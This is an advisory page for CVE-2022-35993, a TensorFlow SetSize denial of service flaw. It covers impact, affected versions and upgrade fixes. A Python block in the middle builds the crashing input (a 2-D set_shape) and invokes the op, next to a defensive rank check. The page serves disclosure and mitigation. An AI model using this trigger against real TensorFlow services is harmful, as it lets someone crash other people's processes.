CVE-2022-35993 : Security Advisory and Response

CVE-2022-35993 is a denial of service vulnerability in TensorFlow. This page covers its impact, technical details, and mitigation steps.

TensorFlow is an open source platform for machine learning. When the SetSize operation receives a set_shape input that is not a 1-D tensor, it hits a CHECK failure that aborts the process, which an attacker can use to trigger a denial of service.

Understanding CVE-2022-35993

This section provides key information about the CVE-2022-35993 vulnerability in TensorFlow.

What is CVE-2022-35993?

TensorFlow is affected by a vulnerability in the SetSize operation that allows an attacker to trigger a denial of service by passing a tensor that is not 1-D as the set_shape input.

The Impact of CVE-2022-35993

The vulnerability has a CVSS base score of 5.9 (Medium) with a high impact on availability: the affected process is terminated. There are no known workarounds for this issue; the fix is to upgrade.

Technical Details of CVE-2022-35993

Explore the technical aspects of CVE-2022-35993 below.

Vulnerability Description

The vulnerability arises when SetSize receives a tensor that is not 1-D as its set_shape input. The kernel expects set_shape to be a rank-1 vector of dimension sizes; a tensor of any other rank trips a CHECK failure, which aborts the entire TensorFlow process instead of returning an error to the caller. A single malformed input therefore suffices for a denial of service attack.

Affected Systems and Versions

TensorFlow releases before 2.7.2, the 2.8 series before 2.8.1, and the 2.9 series before 2.9.1 are affected by this vulnerability.

Exploitation Mechanism

An attacker who can control the inputs to the SetSize operation supplies a set_shape tensor whose rank is not 1. The resulting CHECK failure terminates the process, denying service to everything else it was doing.
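As an added example (not TensorFlow's own code and not the advisory's proof of concept), the block below builds the triggering SetSize call described above and pairs it with a Python model of the rank check that the patched kernels perform before touching set_shape. The call goes through the real public API tf.raw_ops.SetSize; the input values are constructed for illustration, and the validate_set_shape function is an assumption about what the fix checks, not TensorFlow's code.

```python
"""Added example for CVE-2022-35993: the SetSize trigger and a pre-flight
rank check that models the validation the patched kernels perform.
Not TensorFlow's code and not the advisory's proof of concept."""
import sys


def rank_of(value):
    """Rank of a nested-list 'tensor' (a bare number has rank 0)."""
    rank = 0
    while isinstance(value, (list, tuple)):
        rank += 1
        if not value:
            break
        value = value[0]
    return rank


def validate_set_shape(set_shape):
    """Model of the check the fix adds (assumption, not TensorFlow's code).

    SetSize expects set_shape to be a 1-D vector of dimension sizes.  The
    vulnerable kernel read it as a vector without checking its rank; the
    CHECK inside that read aborts the whole process when the rank is not 1,
    which is the denial of service.  Patched builds reject the input with an
    InvalidArgument error instead.  Here the rejection is a ValueError.
    """
    rank = rank_of(set_shape)
    if rank != 1:
        raise ValueError(f"set_shape must be a 1-D tensor, got rank {rank}")
    return [int(d) for d in set_shape]


def is_valid_set_shape(set_shape):
    """True if set_shape would pass the rank check."""
    try:
        validate_set_shape(set_shape)
        return True
    except ValueError:
        return False


def setsize_trigger_args():
    """Constructed SetSize inputs with a 2-D set_shape (the trigger).

    set_indices and set_values are a perfectly valid sparse set: one row,
    two elements.  Only set_shape is malformed: it must be the vector
    [n_rows, n_cols] but is given as a 2x2 matrix.
    """
    return {
        "set_indices": [[0, 0], [0, 1]],   # int64, shape [2, 2]: two entries
        "set_values": [7, 9],              # one value per index
        "set_shape": [[1, 2], [3, 4]],     # rank 2 instead of the required rank 1
    }


def run_setsize(args):
    """Call tf.raw_ops.SetSize with the given inputs.

    On an affected TensorFlow build (before 2.7.2, 2.8.1, 2.9.1) a non-1-D
    set_shape hits the CHECK and aborts the interpreter, so this function
    never returns.  On a patched build it returns a 'rejected: ...' string
    from the InvalidArgumentError.  With a 1-D set_shape such as [1, 2] it
    returns the set sizes per row (here [2]).
    """
    import tensorflow as tf  # imported lazily so the rest runs without TF
    try:
        out = tf.raw_ops.SetSize(
            set_indices=tf.constant(args["set_indices"], dtype=tf.int64),
            set_values=tf.constant(args["set_values"], dtype=tf.int64),
            set_shape=tf.constant(args["set_shape"], dtype=tf.int64),
            validate_indices=True,
        )
    except tf.errors.InvalidArgumentError as err:
        return f"rejected: {err.message}"
    return out.numpy().tolist()


if __name__ == "__main__":
    args = setsize_trigger_args()
    # A pre-flight check on the caller's side catches the malformed shape
    # before the op runs; it is not a substitute for upgrading, because an
    # attacker who controls the graph bypasses any Python-level check.
    print("pre-flight rank check passes:", is_valid_set_shape(args["set_shape"]))
    # Pass --run to actually invoke the op.  Do this only on a patched build
    # or in a throwaway process: on an affected build it crashes the process.
    if "--run" in sys.argv:
        print(run_setsize(args))
```

Run with --run only against a patched TensorFlow or inside a disposable process: on an affected build the call does not raise a Python exception, it takes the interpreter down, which is exactly the behaviour the advisory describes.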

Mitigation and Prevention

Discover the steps to mitigate and prevent the CVE-2022-35993 vulnerability.

Immediate Steps to Take

        Update TensorFlow to version 2.10.0, or to the patched release of the branch you run (2.7.2, 2.8.1, or 2.9.1).

Long-Term Security Practices

        Regularly update TensorFlow to the latest version to address security vulnerabilities.

Patching and Updates

        The issue has been patched in TensorFlow 2.10.0, and the fix has been backported to versions 2.7.2, 2.8.1, and 2.9.1 to address the vulnerability.
